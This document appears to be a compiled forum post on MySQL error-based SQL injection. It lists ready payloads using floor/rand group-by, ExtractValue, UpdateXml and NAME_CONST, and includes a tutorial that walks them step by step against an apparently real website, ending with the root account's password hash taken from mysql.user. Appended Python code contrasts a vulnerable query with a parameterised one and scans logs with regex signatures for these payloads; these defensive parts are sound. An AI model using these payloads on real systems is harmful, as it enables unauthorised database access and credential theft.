1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement produces the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed inside the error message. To retrieve other data, replace the version() expression with the desired subquery.

For example, to query the administrator username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
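All three techniques above depend on the same two application defects: the id value is spliced into the text of "select * from article where id = ..." and the raw MySQL error is returned to the client. The following Python example is added here as an illustration and is not part of the original post. It uses an in-memory SQLite stand-in for the article table (constructed sample data, and SQLite rather than MySQL so it runs offline) to show the vulnerable lookup beside a parameterised one that also stops echoing engine errors. The names make_db, vulnerable_lookup, hardened_lookup, SERVER_LOG and PAYLOAD are assumptions for the example.

```python
import sqlite3

# Server-side error sink for the hardened version (stand-in for a real logger).
SERVER_LOG = []

# One of the payload shapes from the post, as it would arrive in the id parameter.
PAYLOAD = "1 and extractvalue(1, concat(0x5c, (select user())))"


def make_db():
    """In-memory stand-in for the post's article table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    return conn


def vulnerable_lookup(conn, user_id):
    """The pattern the post exploits: the user-supplied id is concatenated into
    the SQL text, and whatever the engine says about it goes straight back to
    the caller. Both defects are needed for error-based injection: the first
    lets input become SQL, the second turns the error message into the data
    channel."""
    try:
        sql = "select * from article where id = " + user_id
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # Echoing the engine error is exactly what the post's payloads rely on.
        return {"rows": [], "error": str(exc)}


def hardened_lookup(conn, user_id):
    """Parameterised version: the id travels as a bound value and is never
    parsed as SQL, so 'and extractvalue(...)' is only a string that matches no
    row. Engine errors are recorded server-side and the caller sees a generic
    message, which closes the error channel even if some other bug remained."""
    try:
        rows = conn.execute("select * from article where id = ?", (user_id,)).fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error as exc:
        SERVER_LOG.append(str(exc))
        return {"rows": [], "error": "internal error"}


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1"))         # the normal row
    print(vulnerable_lookup(db, PAYLOAD))     # engine error text is echoed back
    print(hardened_lookup(db, PAYLOAD))       # no rows, nothing leaked
```

SQLite has no extractvalue(), so the vulnerable path surfaces a "no such function" message where MySQL would surface the XPATH error shown above; the defect being demonstrated is the same, namely that the engine's own words reach the client. Binding the value also means a numeric id column should additionally be validated as an integer before the query, but the parameterised statement is what removes the injection itself.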
Further collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1);

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error Duplicate column name '1'

Now let's get the tables out this bitch...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job..

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
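Added as a defender's counterpart to the payloads collected on this page (the floor()/rand() group-by, ExtractValue and UpdateXml families from the first part of the post, and the NAME_CONST family from the tutorial above): a Python detector that is not part of the original post. It URL-decodes the request target of constructed web-server access log lines and classifies each by the error-based family it carries, and separately flags the MySQL error strings the post shows being reflected to clients when they turn up in an application error log. The log lines, addresses, timestamps and status codes are constructed for the example (the query strings reuse the payload shapes shown on the page); the function and pattern names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the four error-based families shown on this page. They are
# applied to the URL-decoded, lower-cased query string of each request.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const": re.compile(r"\bname_const\s*\("),
}

# MySQL messages the post shows being reflected to the client. Seeing them in
# an application error log means raw engine errors reach the web tier at all.
DB_ERROR_LEAKS = re.compile(
    r"duplicate entry .* for key 'group_key'|xpath syntax error|duplicate column name",
    re.I,
)

# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_query(access_line):
    """Return the request's query string, URL-decoded ('+' becomes a space)
    and lower-cased; empty string if the line carries no request."""
    m = REQUEST_RE.search(access_line)
    if not m:
        return ""
    return unquote_plus(urlsplit(m.group(1)).query).lower()


def classify_request(access_line):
    """Names of the signature families present in one access log line."""
    query = decode_query(access_line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def scan_access_log(lines):
    """(line number, families) for every line carrying at least one signature."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        families = classify_request(line)
        if families:
            hits.append((lineno, families))
    return hits


def scan_error_log(lines):
    """Line numbers of error log entries containing a leaked MySQL error."""
    return [lineno for lineno, line in enumerate(lines, 1) if DB_ERROR_LEAKS.search(line)]


# Constructed sample logs for this example. The first access line is benign;
# the other three carry the page's payload shapes URL-encoded as a browser would.
ACCESS_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /content/detail.php?id=330+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:55:49 +0000] "GET /content/detail.php?id=330+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 0',
]
ERROR_LOG = [
    "[10/Oct/2023:13:55:36] php: notice: undefined index sid",
    "[10/Oct/2023:13:55:41] mysql: ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "[10/Oct/2023:13:56:02] mysql: Error Duplicate column name '5.0.27-community-nt'",
]

if __name__ == "__main__":
    for lineno, families in scan_access_log(ACCESS_LOG):
        print(f"access line {lineno}: {', '.join(families)}")
    for lineno in scan_error_log(ERROR_LOG):
        print(f"error line {lineno}: leaked MySQL error")
```

The two scans are complementary: the access-log patterns flag the probe whether or not it succeeded, while hits in the error log show that raw engine errors are reaching the application tier at all, which is the condition every technique on this page depends on. The patterns are deliberately narrow, since benign parameters rarely contain these function names; widen or add to them only after checking them against your own traffic, and treat a 500 response paired with one of these families as the highest-priority combination.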